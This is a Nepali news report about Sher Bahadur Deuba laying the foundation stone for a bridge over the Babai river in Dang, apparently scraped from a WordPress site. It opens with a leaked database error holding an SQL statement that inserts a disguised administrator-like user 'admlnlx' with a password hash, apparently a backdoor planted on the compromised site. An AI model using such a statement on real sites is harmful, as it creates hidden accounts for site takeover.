WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B956GI6fJqaaaaENPVC2nNHV4wJFdp0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:26:53', '', 'admlnlx', 'admlnlx')
दाङ,माघ १२ –
नेपाली काँग्रेसका सभापति शेरबहादुर देउवाले आज एक समारोहबीच दाङ पञ्चकुले गाविस –६ मठौराको बबई नदीमा पुलको शिलान्यास गर्नुभयो ।
रु २४ करोडको लागतमा निर्माण हुनलागेको सो पुलको लम्वाई दुई सय मिटर रहेका छन् । सो पुलको निर्माण कार्य २०७५ पुस महिनासम्म सम्पन्न गर्ने लक्ष्य लिएका छन् ।
सो अवसरमा सभापति देउवाले सडक सञ्जाल विकासको मेरुदण्ड भएको उल्लेख गर्दै पुल निर्माणसँगै यस क्षेत्रको विकासले गति लिने विश्वास व्यक्त गर्नुभयो ।
पुल निर्माण भएसँगै स्थानीयवासीलाई आवतजावत गर्न तथा कृषि उपजलाई बजारसम्म पु¥याउन सहज हुने बताउँदै तोकिएकै मितिमा काम सम्पन्न गर्न सम्बन्धीत निकायलाई आग्रह गर्नुभयो ।
सिँचाइ मन्त्री दीपक गिरीले दाङ जिल्लामा रहेका नदी खोलामा पुल निर्माण गरी सडक सञ्जाललाई जोडने कार्यलाई सरकारले प्राथमिकता दिएको बताउँदै यहाँको सडक स्तरोन्नतिका लागि आफूले पहल गरिरहेको धारणा व्यक्त गर्नुभयो । – रासस